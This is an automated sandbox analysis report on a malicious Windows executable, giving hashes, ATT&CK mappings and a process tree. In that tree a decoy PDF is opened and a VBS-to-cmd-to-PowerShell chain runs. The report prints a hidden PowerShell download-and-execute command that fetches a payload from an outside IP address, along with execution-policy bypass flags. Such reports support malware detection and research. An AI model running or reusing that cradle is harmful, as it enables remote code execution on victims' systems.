b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af

General

Target

b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe
Size

465KB
MD5

18f89dc05d67aae003c7f8b2b60394d6
SHA1

5844e2aff3d3ad18bef6d132e94298aba2e59dbc
SHA256

b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af
SHA512

e02d3a702acec75118b5244a40b2bf53c5f4be09251251093e75547332e7fa942abaac7b18d427b8decc1c624db34c41dbf07446aedde8ef1fbe0c147a681497
SSDEEP

12288:DCQjgAtAHM+vetZxF5EWry8AJGy0VMgEi:D5ZWs+OZVEWry8AFqEi

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.168.221.129:44/download/payloadx86_.ps1

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2636	powershell.exe
2884	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2884	powershell.exe
2636	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2208	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2208	AcroRd32.exe
2208	AcroRd32.exe
2208	AcroRd32.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 2208	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	29
PID 2592 wrote to memory of 2208	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	29
PID 2592 wrote to memory of 2208	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	29
PID 2592 wrote to memory of 2208	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	29
PID 2592 wrote to memory of 2740	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	30
PID 2592 wrote to memory of 2740	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	30
PID 2592 wrote to memory of 2740	2592	b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe	30
PID 2740 wrote to memory of 2976	2740	WScript.exe	31
PID 2740 wrote to memory of 2976	2740	WScript.exe	31
PID 2740 wrote to memory of 2976	2740	WScript.exe	31
PID 2976 wrote to memory of 2884	2976	cmd.exe	33
PID 2976 wrote to memory of 2884	2976	cmd.exe	33
PID 2976 wrote to memory of 2884	2976	cmd.exe	33
PID 2884 wrote to memory of 2636	2884	powershell.exe	34
PID 2884 wrote to memory of 2636	2884	powershell.exe	34
PID 2884 wrote to memory of 2636	2884	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe
"C:\Users\Admin\AppData\Local\Temp\b831b03fcb06244c79c75a0c73085126b8809e4f72be2c4c658e60cd07b6f3af.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\test.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2208
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\shell.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C START /B C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -file C:\Users\Admin\AppData\Local\Temp\shell.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -file C:\Users\Admin\AppData\Local\Temp\shell.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -nop -w hidden -noe -c "IEX ((new-object net.webclient).downloadstring('http://192.168.221.129:44/download/payloadx86_.ps1'))"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\shell.ps1

Filesize
152B

MD5
da4f7cc01b0879c04f5f9a5c3c8676e8

SHA1
65bc3cb548b0617c24950d80e8947f3677a790ed

SHA256
4203915a7e288bbb621bf9a0120c13cd7d63b7c94692c148e694b4c72479f5de

SHA512
aba7dca197f61a7049f23165bfacadf291a7e7fc8d9140124244e72964fa9d9f8343c75456e79dee2e20c9635f14a8f12220a40700f1f253bdb85f69ffe516ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\shell.vbs

Filesize
254B

MD5
73cce9205d9b2c0ef64960c9a49502d1

SHA1
b4a7a307225278b714e24c35d9c63e883559b70e

SHA256
f85f46d341680019be082290131fa563528788083046dfd8a902cd6b5362c3b0

SHA512
4270fe3912503f775c451472f4f06509349e78b96f83085287ac4a13e80d032b9605c5a592205bf0873dd0860daf798c75ea9c7b2fd15219b919feb96c64fca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.pdf

Filesize
21KB

MD5
a7c53fff793492363a45a36531c1da27

SHA1
126b6f1a12ed08866db2d7dc3cdee8ccf3c19b2b

SHA256
96b36e14df5655dccedd37efdbffb36d78838719dcd025f1496d43accfcb017c

SHA512
a3657cc40d70bb88d7aa9b5a254b13462ea5e28f7373c5cb1c0f007c22a70fe4e79ae7223191b9a009cb09994afd98021fe3ff7fc407b38ad170203ed853b735

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
521d672949111d2580bc39a2928ea49d

SHA1
80eaed46ae537ac0c7eb4b2a7ac2e8712cf2770f

SHA256
71cd979496d24ea737b94e6e9bec1ef89f40ea9cc31a4f90fe6f06a9deeb63c6

SHA512
dd51ab354830af5f37d45b739f89eb0a7712382d9ea42c41bd9fa290e34f38c10c223d454c295f30052bd5d2b5a30a38abb7968ca9a68a26819f07e7b6b32e1b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a130c11e8b394accb066468556b67408

SHA1
a3a6f45980ddf0c7f630a040989ce79296504a24

SHA256
c1ae473d924922b591fef2eb9f8f32effcf4c4d6baa6e8c95168fd78c14e5516

SHA512
5a052376913ca617a7851738573ce3c03eed44c0e098a66175bba74434d0cfcc8401169a8d3282bdb7f105fc56d4c8c3bfa20b24d791ae028deb8c62f61351b8

Download Submit
memory/2884-13-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2884-14-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing